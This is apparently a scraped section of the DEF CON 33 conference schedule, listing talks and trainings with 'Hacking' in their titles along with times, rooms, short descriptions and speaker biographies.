Benjamin is a technology professional and lifelong hacker whose journey began with an Amiga 1000 and an endless sense of curiosity. He taught himself how to keep it running—troubleshooting, repairing failed components, and learning the ins and outs of the machine. From there, he moved on to DOS on a Packard Bell and eventually to building custom systems. That early hands-on experience evolved into a career spanning multiple industries and roles, where he designed, deployed, and managed complex networks and systems. While hardware remains a passion, his current work focuses on secure communications and building tools for resilient network infrastructure. When he’s not buried in RFCs, technical docs, or writing integrations, Benjamin is likely rock climbing or exploring underwater cave systems—boldly going where no man has gone before.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Sunday - 11:00-11:59 PDT


Title: Hacker vs. Triage: Inside the Bug Bounty Battleground
When: Sunday, Aug 10, 11:00 - 11:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

This talk explores the tension between hackers and triagers in bug bounty programs. We present real cases from both perspectives, unpacking what went wrong, how to communicate better, and how to turn confrontations into collaboration—with practical takeaways for hackers, triagers, and program managers alike.

Speakers:Richard "richeeta" Hyunho Im,Denis Smajlović

SpeakerBio:  Richard "richeeta" Hyunho Im

Richard Hyunho Im (@richeeta) is a senior security engineer and independent vulnerability researcher at Route Zero Security. Currently ranked among the top 25 researchers in OpenAI's bug bounty program, Richard has also received security acknowledgements from Apple (CVE-2025-24198, CVE-2025-24225, CVE-2025-30468, and CVE-2024-44235), Microsoft, Google, and the BBC. His research highlights overlooked attack surfaces, focusing on practical exploitation that challenges assumptions about everyday software security.

SpeakerBio:  Denis Smajlović, Nova Information Security

Denis Smajlović (@deni) is an OSCP-certified security engineer and Principal Security Consultant at Nova Information Security. Denis brings extensive experience managing high-profile bug bounty programs and collaborating closely with Fortune 500 companies, global tech firms, and major financial institutions. His specialty lies in bridging gaps between external researchers and internal security teams, clearly translating vulnerabilities into tangible business impacts, and fostering constructive, trust-based relationships between hackers and corporate triagers.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 13:00-13:45 PDT


Title: Hackers Dropping Mid-Heist Selfies: LLM Identifies Information Stealer Infection Vector and Extracts IoCs
When: Saturday, Aug 9, 13:00 - 13:45 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Information stealer malware is one of the most prolific and damaging threats in today’s cybercrime landscape, siphoning off everything from browser-stored credentials to session tokens. In 2024 alone, we witnessed more than 30 million stealer logs traded on underground markets. Yet buried within these logs is a goldmine: screenshots captured at the precise moment of infection. Think of it as a thief taking a selfie mid-heist, unexpected but convenient for us, right? Surprisingly, these crime scene snapshots have been largely overlooked until now. Leveraging them with Large Language Models (LLMs), we propose a new approach to identify infection vectors, extract indicators of compromise (IoCs) and track infostealer campaigns at scale. In our analysis, we will break down three distinct campaigns to illustrate their tactics to deliver malware and deceive victims.

With its live demonstration, this presentation shows how LLMs can be harnessed to extract IoCs at scale while addressing the challenges and costs of implementation. Attendees will walk away with a deeper understanding of the modern infostealer ecosystem and will want to apply LLM to any illicit artifacts to extract actionable intelligence.

Speakers:Olivier Bilodeau,Estelle Ruellan

SpeakerBio:  Olivier Bilodeau

Olivier Bilodeau, a principal researcher at Flare, brings 15+ years of cutting-edge infosec expertise in honeypot operations, binary reverse-engineering, and RDP interception. Passionate communicator, Olivier spoke at conferences like BlackHat, DEFCON, SecTor, Derbycon, and more. Invested in his community, he co-organizes MontréHack, is NorthSec’s President, and runs its Hacker Jeopardy.

SpeakerBio:  Estelle Ruellan

Estelle is a Threat Intelligence Researcher at Flare. With a background in Mathematics and Criminology, Estelle lost her way into cybercrime and is now playing with lines of code to help computers make sense of the cyber threat landscape. She presented at conferences like ShmooCon 2025, Hack.lu 2024, eCrime APWG 2024 in Boston and the 23rd Annual European Society of Criminology Conference (EUROCRIM 2023) in Florence.


Return to Index    -    Add to Google    -    ics Calendar file

CHV - Friday - 16:00-16:30 PDT


Title: Hacking a head unit with malicious PNG
When: Friday, Aug 8, 16:00 - 16:30 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

In this talk, I reveal the discovery of a novel RTOS running on automotive head units, uncovered through hardware hacking and reverse engineering. This RTOS, found in thousands of vehicles, exhibits numerous bugs and intriguing functionalities. I demonstrate how a crafted PNG file was used as a backdoor to compromise the system, highlighting both the innovative features and critical vulnerabilities present in current automotive technologies.

SpeakerBio:  Danilo Erazo
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BBV - Sunday - 11:00-11:30 PDT


Title: Hacking at Scale with AI Agents: Building an Autonomous Bug Bounty Hunter
When: Sunday, Aug 10, 11:00 - 11:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

This talk explores the cutting edge of combining AI with bug bounty hunting — not just for productivity, but for autonomous vulnerability discovery. We’ll dive into how I engineered a multi-tool, AI-driven agent that performs web application reconnaissance, runs targeted scans, interprets responses, and routes tasks across a sandboxed toolkit using natural language prompts.

SpeakerBio:  Vanshal Gaur

Vanshal is a security engineer and AI researcher focused on web application security and automation. He has responsibly disclosed vulnerabilities through platforms like HackerOne and Bugcrowd, and his recent work explores how artificial intelligence can scale vulnerability discovery. Vanshal has built AI-powered agents that automate recon, analyze HTTP responses, and identify real bugs across thousands of domains. He’s also worked on secure sandboxing for running hacking tools safely. At DEF CON 33, he’ll share how he built an autonomous bug bounty agent — from prompt engineering and tool orchestration to live recon and vulnerability triage. His talk blends hands-on hacking with AI, aimed at researchers who want to scale their impact with modern tooling.


Return to Index    -    Add to Google    -    ics Calendar file

PHV - Saturday - 17:00-17:59 PDT


Title: Hacking Context for Auto Root Cause and Attack Flow Discovery
When: Saturday, Aug 9, 17:00 - 17:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Modern SOCs are flooded with alerts yet blind to what matters. This talk shows how to auto-discover attack flows and root causes by hacking context across telemetry, logs, and threat signals. Using open-source tools and correlation logic, we’ll walk through real-world detection pipelines that stitch together events across cloud, endpoint, and network environments. You'll learn lightweight, vendor-agnostic approaches to enrich data, group alerts by incident, and make sense of security chaos — fast.

SpeakerBio:  Ezz Tahoun

Ezz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Hacking Cryptography: Attacks, Tools, and Techniques
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Crypto related bugs are super common. OWASP even ranks "Cryptographic Failure" as the second most common security vulnerability class in software. Yet, very often these vulnerabilities are overlooked by developers, code auditors, blue teamers and penetration testers alike. Because, let's face it: Nobody knows how cryptography works.

During the course you will:

Using case studies from our own pentesting and red teaming engagements, we'll introduce core concepts of applied cryptography and how they fail in practice.

This course turns you into a powerful weapon. You will know how applied cryptography works, how it's commonly misused in the field and how this leads to exploitable bugs. That means, by the end of the course you will be among the very selected group of people that can identify, avoid and exploit vulnerabilities in code using crypto.

No prior knowledge required!

Learning Objectives

Speakers:Ruben Gonzalez,Benjamin Walny

SpeakerBio:  Ruben Gonzalez, Security Researcher and Trainer at Neodyme
SpeakerBio:  Benjamin Walny, Senior Penetration Tester at Cure53

Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Hacking Cryptography: Attacks, Tools, and Techniques
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Crypto related bugs are super common. OWASP even ranks "Cryptographic Failure" as the second most common security vulnerability class in software. Yet, very often these vulnerabilities are overlooked by developers, code auditors, blue teamers and penetration testers alike. Because, let's face it: Nobody knows how cryptography works.

During the course you will:

Using case studies from our own pentesting and red teaming engagements, we'll introduce core concepts of applied cryptography and how they fail in practice.

This course turns you into a powerful weapon. You will know how applied cryptography works, how it's commonly misused in the field and how this leads to exploitable bugs. That means, by the end of the course you will be among the very selected group of people that can identify, avoid and exploit vulnerabilities in code using crypto.

No prior knowledge required!

Learning Objectives

Speakers:Ruben Gonzalez,Benjamin Walny

SpeakerBio:  Ruben Gonzalez, Security Researcher and Trainer at Neodyme
SpeakerBio:  Benjamin Walny, Senior Penetration Tester at Cure53

Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 12:00-13:50 PDT


Title: Hacking Custody and Exchanges
When: Saturday, Aug 9, 12:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

Cryptocurrency exchanges have the reputation of keeping 'not your keys so not your coins', but we analyze further to understand what technology powers them and which security aspects serve users. In this hour we use tools like Helloex and Octobot to build our own experimental testnet exchange. Your team divides into exchange providers maintaining stability and opportunistic traders taking advantage of system loopholes. A group discussion finally concludes under which conditions cryptocurrency exchanges provide security and value.

Speakers:Sky Gul,Andrea

SpeakerBio:  Sky Gul
No BIO available
SpeakerBio:  Andrea
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PSV - Friday - 14:00-14:59 PDT


Title: Hacking Hotel Locks; The Saflok Vulnerabilities Expanded
When: Friday, Aug 8, 14:00 - 14:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Saflok locks are present in many hotels and apartments across North America. These locks rely on poorly-secured offline authentication mechanisms, leaving them vulnerable to attackers with basic knowledge about how the system operates. Following up on the initial "Unsaflok" presentation at DEF CON 32 by Lennert Wouters and Ian Carroll, this talk will touch on areas of the system not discussed in the original presentation, such as the handheld programmer, lock programming interface, clarity about the bit fields and unencrypted data in credentials, for yet another example of why you don't rely on security-through-obscurity for security products.

Speakers:Noah Holland,Josh Stiebel

SpeakerBio:  Noah Holland, Michigan Technological University (Student)

Noah Holland is a Cybersecurity Undergraduate at Michigan Tech. He is the president of the MTU Linux User's Group and MTU RedTeam, specializing in Access Control & Physical Security.

SpeakerBio:  Josh Stiebel

Josh Stiebel recently graduated with a CS degree from Michigan Tech. He helps run the access control village at various conventions. He is currently walking from Mexico to Canada on the PCT.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 17:30-17:50 PDT


Title: Hacking Hotspots: Pre-Auth Remote Code Execution, Arbitrary SMS & Adjacent Attacks on 5G and 4G/LTE Routers
When: Saturday, Aug 9, 17:30 - 17:50 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

This research examines security oversights in a range of modern 4G/5G routers used in small businesses, industrial IoT, and everyday mobile deployments. Several of these routers contain vulnerabilities reminiscent of older security flaws, such as weak default credentials, inadequate authentication checks, and command injection pathways. By reverse-engineering firmware and testing for insecure endpoints, it was possible to demonstrate remote code execution, arbitrary SMS sending, and other serious exploits affecting Tuoshi and KuWFi devices.

Through practical examples, including Burp Suite requests and Ghidra disassembly, the talk highlights how these weaknesses can grant attackers root access, allow fraudulent activity, or compromise entire networks. In each case, mitigation strategies and best practices—like robust authentication, regular firmware updates, and network segmentation—are emphasized. Ultimately, this presentation underscores the importance of continuous security scrutiny, even for modern hardware, and encourages the community to stay vigilant and collaborate in uncovering and addressing such pervasive vulnerabilities.

References:

SpeakerBio:  Edward "Actuator" Warren

Edward Warren is an Information Security Analyst and Independent Security Researcher specializing in IoT and mobile application security. Over the past few years he has discovered critical (CVSS) 0-day vulnerabilities. Edward also earned a Hall of Fame acknowledgement from the Google Play Security Reward Program (GPSRP) and attribution in numerous CVE publications. He has presented his work at conferences such as BSides and ShmooCon. When not tracking down digital bugs, Edward can be found hiking rugged trails or exploring the seas through his newfound fascination for scuba diving.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Hacking Modern Web Apps: Master the Future of Attack Vectors
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This course is a 100% hands-on deep dive into the OWASP Security Testing Guide and relevant items of the OWASP Application Security Verification Standard (ASVS), so this course covers and goes beyond the OWASP Top Ten.

Long are the days since web servers were run by perl scripts apps written in Delphi. What is common between Walmart, eBay, PayPal, Microsoft, LinkedIn, Google and Netflix? They all use Node.js: JavaScript on the server.

Modern Web apps share traditional attack vectors and also introduce new opportunities to threat actors. This course will teach you how to review modern web apps, showcasing Node.js but using techniques that will also work against any other web app platform. Ideal for Penetration Testers, Web app Developers as well as everybody interested in JavaScript/Node.js and Modern app stack security.

Get a FREE taste for this training, including access to video recording, slides and vulnerable apps to play with:

1 hour workshop - https://7asecurity.com/free-workshop-web-apps

All action, no fluff, improve your security analysis workflow and immediately apply these gained skills in your workplace, packed with exercises, extra mile challenges and CTF, self-paced and suitable for all skill levels, with continued education via unlimited email support, lifetime access, step-by-step video recordings and interesting apps to practice, including all future updates for free.

Speakers:Abraham Aranguren,Anirudh Anand,Ashwin Shenoi

SpeakerBio:  Abraham Aranguren

After 17 years in itsec and 24 in IT, Abraham Aranguren is now the CEO of 7ASecurity (7asecurity.com), a company specializing in penetration testing of web/mobile apps, infrastructure, code reviews and training. Co-Author of the Mobile, Web and Desktop (Electron) app 7ASecurity courses. Security Trainer at Blackhat USA, HITB, OWASP Global AppSec and many other events. OWASP OWTF project leader, an OWASP flagship project (owtf.org), Major degree and Diploma in Computer Science, some certs: CISSP, OSCP, GWEB, OSWP, CPTS, CEH, MCSE:Security, MCSA:Security, Security+. As a shell scripting fan trained by unix dinosaurs, Abraham wears a proud manly beard. He writes on Twitter as @7asecurity @7a_ @owtfp or https://7asecurity.com/blog. Multiple presentations, pentest reports and recordings can be found at https://7asecurity.com/publications.

SpeakerBio:  Anirudh Anand

Anirudh Anand is a security researcher with a primary focus on Web and Mobile Application Security. He is currently working as a Principal Security Engineer at CRED and also Security Trainer at 7asecurity. He has been submitting bugs and contributing to security tools for over 9 years. In his free time, he participates in CTF competitions along with Team bi0s (#1 security team in India according to CTFtime). His bounties involve vulnerabilities in Google, Microsoft, LinkedIn, Zendesk, Sendgrid, Gitlab, Gratipay and Flipboard.

Anirudh is an open source enthusiast and has contributed to several OWASP projects with notable contributions being in OWTF and Hackademic Challenges Project. He has presented/trained in a multitude of conferences including BlackHat US 2020, OWASP NZ 2021, HackFest CA 2021, c0c0n 2019, BlackHat Arsenal 2019, BlackHat Europe Arsenal 2018, HITB Dubai 2018, Offzone Moscow 2018, Ground Zero Summit Delhi 2015 and Xorconf 2015.

SpeakerBio:  Ashwin Shenoi

Ashwin Shenoi is an avid application security enthusiast who currently works as a Senior Security Engineer at CRED and likes to break into applications and automate stuff. He is part of team bi0s, the top ranked CTF team according to CTFTime. He heads the Web Security team at team bi0s and is also the core challenge setter and organiser of the various editions of InCTF and the other CTFs organised by team bi0s. He has also presented talks in various security meet-ups and conferences including BlackHat Asia and BlackHat USA. He does a fair share of breaking into open source applications services and has also been awarded several CVEs for the same.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Hacking Modern Web Apps: Master the Future of Attack Vectors
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This course is a 100% hands-on deep dive into the OWASP Security Testing Guide and relevant items of the OWASP Application Security Verification Standard (ASVS), so this course covers and goes beyond the OWASP Top Ten.

Long are the days since web servers were run by perl scripts apps written in Delphi. What is common between Walmart, eBay, PayPal, Microsoft, LinkedIn, Google and Netflix? They all use Node.js: JavaScript on the server.

Modern Web apps share traditional attack vectors and also introduce new opportunities to threat actors. This course will teach you how to review modern web apps, showcasing Node.js but using techniques that will also work against any other web app platform. Ideal for Penetration Testers, Web app Developers as well as everybody interested in JavaScript/Node.js and Modern app stack security.

Get a FREE taste for this training, including access to video recording, slides and vulnerable apps to play with:

1 hour workshop - https://7asecurity.com/free-workshop-web-apps

All action, no fluff, improve your security analysis workflow and immediately apply these gained skills in your workplace, packed with exercises, extra mile challenges and CTF, self-paced and suitable for all skill levels, with continued education via unlimited email support, lifetime access, step-by-step video recordings and interesting apps to practice, including all future updates for free.

Speakers:Abraham Aranguren,Anirudh Anand,Ashwin Shenoi

SpeakerBio:  Abraham Aranguren

After 17 years in itsec and 24 in IT, Abraham Aranguren is now the CEO of 7ASecurity (7asecurity.com), a company specializing in penetration testing of web/mobile apps, infrastructure, code reviews and training. Co-Author of the Mobile, Web and Desktop (Electron) app 7ASecurity courses. Security Trainer at Blackhat USA, HITB, OWASP Global AppSec and many other events. OWASP OWTF project leader, an OWASP flagship project (owtf.org), Major degree and Diploma in Computer Science, some certs: CISSP, OSCP, GWEB, OSWP, CPTS, CEH, MCSE:Security, MCSA:Security, Security+. As a shell scripting fan trained by unix dinosaurs, Abraham wears a proud manly beard. He writes on Twitter as @7asecurity @7a_ @owtfp or https://7asecurity.com/blog. Multiple presentations, pentest reports and recordings can be found at https://7asecurity.com/publications.

SpeakerBio:  Anirudh Anand

Anirudh Anand is a security researcher with a primary focus on Web and Mobile Application Security. He is currently working as a Principal Security Engineer at CRED and also Security Trainer at 7asecurity. He has been submitting bugs and contributing to security tools for over 9 years. In his free time, he participates in CTF competitions along with Team bi0s (#1 security team in India according to CTFtime). His bounties involve vulnerabilities in Google, Microsoft, LinkedIn, Zendesk, Sendgrid, Gitlab, Gratipay and Flipboard.

Anirudh is an open source enthusiast and has contributed to several OWASP projects with notable contributions being in OWTF and Hackademic Challenges Project. He has presented/trained in a multitude of conferences including BlackHat US 2020, OWASP NZ 2021, HackFest CA 2021, c0c0n 2019, BlackHat Arsenal 2019, BlackHat Europe Arsenal 2018, HITB Dubai 2018, Offzone Moscow 2018, Ground Zero Summit Delhi 2015 and Xorconf 2015.

SpeakerBio:  Ashwin Shenoi

Ashwin Shenoi is an avid application security enthusiast who currently works as a Senior Security Engineer at CRED and likes to break into applications and automate stuff. He is part of team bi0s, the top ranked CTF team according to CTFTime. He heads the Web Security team at team bi0s and is also the core challenge setter and organiser of the various editions of InCTF and the other CTFs organised by team bi0s. He has also presented talks in various security meet-ups and conferences including BlackHat Asia and BlackHat USA. He does a fair share of breaking into open source applications services and has also been awarded several CVEs for the same.


Return to Index    -    Add to Google    -    ics Calendar file

ASV - Sunday - 11:00-11:30 PDT


Title: Hacking Space to Defend It: Generating IoBs with SPARTA
When: Sunday, Aug 10, 11:00 - 11:30 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

As we know, spacecraft will become prime targets in the modern cyber threat landscape, as they perform critical functions like communication, navigation, and Earth observation. While the launch of the SPARTA framework in October 2022 gave the community insight into potential threats, it didn’t address how to detect them in practical scenarios. In 2025, our research took a different approach as we didn’t just theorize about threats, we actively exploited space systems using SPARTA techniques to figure out what Indicators of Behavior (IoBs) would look like in a real-world attack scenario.

By leveraging offensive cyber techniques from SPARTA, we identified the specific patterns and behaviors that adversaries might exhibit when targeting spacecraft. These insights allowed us to systematically develop IoBs tailored to the operational constraints and unique environments of space systems. As a result, we demonstrated how Intrusion Detection Systems (IDS) for spacecraft can be designed with realistic, data-driven threat profiles.

This presentation will walk through our methodology, from exploiting space systems to crafting practical IoBs, and how these insights can directly translate to building robust IDS solutions. We’ll show how a threat-informed, hands-on approach to cybersecurity can transform theoretical knowledge into practical defenses for space infrastructure.

SpeakerBio:  Brandon Bailey, The Aerospace Corporation
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCW - Sunday - 09:00-12:59 PDT


Title: Hacking the connected plant: AI edition!
When: Sunday, Aug 10, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N254 - Map

Description:

Tired of legacy ICS systems? Attend this workshop to hack the next generation of Industrial Control Systems,! No more Modbus, no more standard PLC, no more Purdue model! This workshop is designed to show what the future might look like for Industrial Control Systems, with a focus on ML & AI!

We’ll bring a realistic ICS setup that features all the fancy current and future trends: SD-WAN and Zero Trust, OPC-UA, MQTT, Digital Twin, Edge devices and soft-PLCs to control a small-scale industrial process simulation. This year, we’ll also add some machine learning and LLM challenges! Will you be able to trick the ICS virtual assistant into giving you access to the production systems?

After a short introduction, we’ll get into hacking! We will walk you through a CTF-style exercise to go from 0 to full industrial process hacking! The CTF will be guided so that everyone learns something and gets a chance to get most flags!

Speakers:Arnaud Soullié,Alexandrine TORRENTS

SpeakerBio:  Arnaud Soullié, Senior Manager at Wavestone

Arnaud Soullié is a Senior Manager at Wavestone, a global consulting company. For 15 years, he has been performing security assessments and pentests on all types of targets. He started specializing in ICS cybersecurity 10 years ago. He has spoken at numerous security conferences on ICS topics, including: BlackHat Europe, BruCon, 4SICS, BSides Las Vegas, and DEFCON. He is also the creator of the DYODE project, an open source data diode aimed at ICS. He has taught ICS cybersecurity trainings since 2015.

SpeakerBio:  Alexandrine TORRENTS, Senior Manager at Wavestone

Alexandrine Torrents is a Senior Manager at Wavestone. She started as a penetration tester, and performed several cybersecurity assessments on ICS. She worked on a few ICS models to demonstrate attacks on PLCs and developed a particular tool to request Siemens PLCs. Then, she started working at securing ICS, especially in the scope of the French military law, helping companies offering a vital service to the nation to comply with security rules. Now, Alexandrine works with different industrial CISOs on their cybersecurity projects: defining secure architectures, hardening systems, implementing detection mechanisms. She is also IEC 62443 certified and still performs assessments on multiple environments.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 16:30-16:59 PDT


Title: Hacking the Edge: Real-World ESI Injection Exploits
When: Friday, Aug 8, 16:30 - 16:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

This talk provides a deep dive into Edge Side Includes (ESI) Injection, focusing on real-world findings and advanced exploitation techniques discovered during extensive testing on a private bug bounty program. While often associated with caching servers, ESI can become a potent vulnerability when user input is improperly handled.

SpeakerBio:  Robert "nytr0gen" Vulpe, Senior Security Engineer at UiPath

Robert Vulpe, also known as nytr0gen, is a Senior Security Engineer at UiPath. He is renowned for his expertise in cybersecurity, particularly in assessing product security through various penetration testing methodologies. With over 300 pentest assessments under his belt, Robert has identified and reported over 1500 security vulnerabilities in high-profile companies such as Amazon, PayPal, Goldman Sachs, and Epic Games.

His meticulous approach to security is evident in his detailed and professional reports. He is listed among PayPal's Top 10 Hackers and was selected for the prestigious Forbes 30 under 30 list for his outstanding achievements in cybersecurity. With more than 8 years of experience in source-code review, he possesses a keen eye for identifying code-level security flaws.


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Saturday - 10:30-10:55 PDT


Title: Hacking the First Amendment: A press photographer's perspective on Red Teaming scenarios
When: Saturday, Aug 9, 10:30 - 10:55 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Drawing from personal experience as a press photographer, this talk highlights the underexplored attack surface created by media access at high profile events like concerts, sporting events and political rallies. We explore how the press badge can become a powerful tool in the hands of a red teamer. By taking into account elements of OSINT, social engineering, and physical and network security, we focus on how lessons learned as a press photographer can directly be applied by red teamers (or threat actors!) to gain a foothold. Once that is achieved, individuals can embed themselves directly within high-visibility individuals and high-value, sensitive devices associated with professional sports teams, musicians and bands, and political leaders and lawmakers. The talk also discusses the importance of looking at the ‘bigger picture’, and being aware of threats where people may not consider them to come from. Inspired by the spirit of Johnny Long’s No Tech Hacking, this talk examines how low-tech, high-ingenuity approaches continue to be in a hacker's arsenal. It makes the case that media impersonation is a serious but overlooked threat vector, and one that allows attackers to bypass traditional perimeters.

Speakers:Mansoor Ahmad,Brad Ammerman

SpeakerBio:  Mansoor Ahmad

Mansoor Ahmad is an offensive security practitioner who has always had a curiosity about how things worked. He studied information technology and worked as a news photographer in college. A quiet kid growing up in a foreign country, he would always accompany his father on errands and observe people's reactions to different things and the psychology behind it. This started an itch which he has been scratching since then, that has led to a career in information security. When he's not working, eating or sleeping, Mansoor likes to practice photography and taking naps.

SpeakerBio:  Brad Ammerman

Brad Ammerman, a leading figure in security testing, currently serves as the Senior Director at Prescient Security. His background includes influential roles at companies like Foresite, Optiv Security, Lockheed Martin, DIA, DoD, and Supreme Court of Nevada, where he developed his expertise in offensive security and team management. A skilled hacker himself, Brad is also a recognized speaker, educator, mentor, and disabled veteran, dedicated to teaching and protecting others. He takes great pride in his roles as a devoted husband and father.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 16:30-17:30 PDT


Title: Hacking the Graph: Advanced Target Discovery with OWASP Amass
When: Saturday, Aug 9, 16:30 - 17:30 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

In today's bug bounty landscape, advantage goes to those who can see what others miss. The OWASP Amass Project has long equipped researchers with powerful tools for internet asset discovery, but its newest addition—assoc—takes things to the next level. This talk introduces assoc, a tool that allows hunters to explore the Open Asset Model through custom association triples, a concept inspired by RDF triples used in knowledge graphs. These user-defined relationships enable highly targeted queries across a rich graph of internet data, revealing non-obvious associations between domains, IP addresses, certificates, and legal entities.

SpeakerBio:  Jeff "caffix" Foley, Founder & Project Leader, OWASP AMASS at OWASP

Jeff Foley has over 20 years of experience in information security, focusing on research & development, security assessment, and attack surface management. During the last eight years, Jeff identified a lack of situational awareness in traditional information security programs and shifted his attention to this vital function. He is now the Project Leader for Amass, an OWASP Foundation Flagship Project that provides the community with guidance and tooling for in-depth attack surface mapping and asset discovery. Jeff has assisted various companies with attack surface management and has been invited to speak at conferences. In past lives, Jeff was the Vice President of Research at ZeroFox, focused on proactive cybersecurity outside the traditional corporate perimeter. He also served as the Global Head of Attack Surface Management at Citi, one of the largest global banks, and started their first program addressing exposure management. Jeff began his career serving the United States Air Force Research Laboratory as a contractor specializing in cyber warfare research and development. He concluded his government contracting at Northrop Grumman Corporation, where he performed the roles of Subject Matter Expert for Offensive Cyber Warfare Research & Development and Director of Penetration Testing. In these roles, he also developed a penetration testing training curriculum for the Northrop Grumman Cyber Academy and taught trainers to utilize the material across this international organization. During his time in this profession, Jeff has taught at various academic institutions on offensive security, cloud security, and attack surface management.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 14:00-17:59 PDT


Title: Hacking The Metal: Into the GPU
When: Saturday, Aug 9, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N256 - Map

Description:

There is a creature that lives inside our smartphones, laptops, and PCs, quietly driving their most cutting-edge behaviors. Much larger versions of it hide in datacenters around the world, constantly crunching through massive computation problems. And yet, even experienced engineers find it mysterious. Originally made to boost graphics performance, it has evolved into the engine that powers technologies behind systems like Claude and ChatGPT. In this workshop, we will uncover the nature of this creature: the GPU. Starting with its history and evolution, we will explore how a processor meant to accelerate 3D graphics became the driving force behind modern machine learning and AI. Along the way, we will dive into the design and behavior of neural networks, and discover how a machine built for graphics rendering learned to interpret images and speak human language. Finally, we will investigate how the complexity of neural networks made possible by GPUs can lead to unexpected and strange behaviors... some of which may not be accidental.

SpeakerBio:  eigentourist

Eigentourist is a programmer who learned the craft in the early 1980s. He began formal education in computer science when the height of software engineering discipline meant avoiding the use of GOTO statements. Over the course of his career, he has created code of beautiful simplicity and elegance, and of horrific complexity and unpredictability. Sometimes, it's hard to tell which was which. Today, he works on systems integration and engineering in the healthcare industry.


Return to Index    -    Add to Google    -    ics Calendar file

MHV - Friday - 17:30-17:59 PDT


Title: Hacking the Nautical Rules of the Road: Turn Left for Global Pwnage
When: Friday, Aug 8, 17:30 - 17:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

As part of their training and certifications, most professional mariners memorize the ‘nautical rules of the road’. The International Regulations for Preventing Collisions at Sea (COLREGs), form the foundation of maritime safety by establishing predictable behaviors and shared responsibilities between vessels. This a system with built-in protection and fall-back plans, tried and tested over a long history. But for hackers or cyber defenders—who might not know starboard from Starbucks— understanding these norms may mean the difference between big effect or no effect. Our talk focuses on one memorable guideline that ship drivers often fall back on: Don’t Turn To Port (unless you’re absolutely sure it’s safe). There is plenty of good research out there about how cyber-physical systems such as rudder angle controllers can be manipulated on manned and unmanned systems. There is good writing on the threats unique to maritime choke points. But agnostic to the location, why would cyber manipulation of a rudder to induce a port turn be worse than a starboard one? Our talk will touch briefly on how the rules influence legal liability for collisions at sea, and conclude with encouragement for people to learn the rules of the road and further their own journey in understanding the maritime profession.

Speakers:Amp,Data

SpeakerBio:  Amp, Co-Host of The Material Condition Podcast

AMP spent 10 years driving ships around the globe—now captains a CTF team instead. With an undergrad in electrical engineering and working on a master’s in info systems engineering, AMP made the jump from maritime grit to digital ops, bringing salty sea stories and a screwdriver to every hacking challenge. They’ve co-hosted episodes of Sea Control (CIMSEC) and The Yoke Report, poking at the strange edges of maritime security, cyber policy, and why everything breaks at 2 AM. Into hardware hacking, retro gaming, and running text-based RPGs.

SpeakerBio:  Data, Director of Cyber & Technology

data is a retired Air Force Cyber Warfare Officer with over 20 years of operational experience. He's a CNODP and RIOT grad with a Comp Sci BS from the USAF Academy and a Master's in Cyber Ops from the Air Force Institute of Technology. He's been certified in all 3 NSA Red Team work roles, all 3 offensive SIGINT work roles, qualified in all 6 Cybercom offensive work roles and personally engaged real-world, nation-state-level actors, malware and targets in air, land, sea, space & cyberspace both offensively and defensively. And he's done so with the US, UK, Canada, Australia and New Zealand. He also helped make those cool starship badges you've seen around DEFCON.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 14:30-14:50 PDT


Title: HaKCing OBD-II Emissions Testing
When: Saturday, Aug 9, 14:30 - 14:50 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

We're going to explore how OBD-II emissions testing works and how you might go about convincing the scanner that everything is fine.

References:

SpeakerBio:  Archwisp

Long-time tech nerd, car enthusiast, and hardware hacker


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


